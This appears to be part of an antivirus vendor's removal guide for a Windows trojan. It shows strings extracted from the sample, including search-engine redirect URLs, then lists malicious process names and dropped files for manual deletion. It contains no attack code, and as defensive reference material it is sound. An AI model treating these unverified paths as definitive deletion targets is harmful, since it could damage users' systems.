6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    EXE_temp1.EXE:308
    shock.exe:3516
    taskkill.exe:1700
    EXE_temp4.EXE:1516
    ping.exe:1580
    ping.exe:1416
    svchots.exe:3760
    EXE_temp2.exe:1176
    huodongtongzhi.exe:1032
    netsh.exe:3916
    MiniIE.exe:3436
    qtool.exe:3460
    EXE_temp0.exe:980
    wpzir.exe:3300
    %original file name%.exe:1040

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)
    %WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
    %WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
    %WinDir%\JMt\sys32\shock.dll (845 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)
    %Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)
    %WinDir%\JMt\win32\DPro.sys (784 bytes)
    %WinDir%\JMt\win32\reTcp.sys (196 bytes)
    %WinDir%\JMt\win32\config.ini (46 bytes)
    %WinDir%\JMt\win32\rename.exe (5480 bytes)
    %Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
    %WinDir%\share\kbdf.dat (122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
    %Documents and Settings%\%current user%\Desktop\史上最劲爆游戏.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
    %WinDir%\share\ico.dll (129 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
    %System%\DqKgbb.dll (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
    %Documents and Settings%\%current user%\Desktop\成人游戏.lnk (1 bytes)
    %WinDir%\share\rsvp\objs.exe (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)
    %WinDir%\JMt\wpzir.exe (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
    %WinDir%\JMt\sys32\whitelist.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %WinDir%\JMt\win32\svchots.txt (70868 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
    %WinDir%\JMt\sys32\shock.txt (18796 bytes)
    %WinDir%\JMt\sys32\whitelist.dat (2 bytes)
    %WinDir%\JMt\sys32\qtool.exe (155 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
    %WinDir%\JMt\First.txt (6988 bytes)
    %WinDir%\JMt\flist.bin (620 bytes)
    %WinDir%\JMt\sys32\shock.exe (111 bytes)
    %WinDir%\JMt\sys32\qtool.txt (26868 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %WinDir%\JMt\win32\svchots.exe (1695 bytes)
    %WinDir%\JMt\MiniIE.txt (46228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
    %WinDir%\JMt\MiniIE.exe (272 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
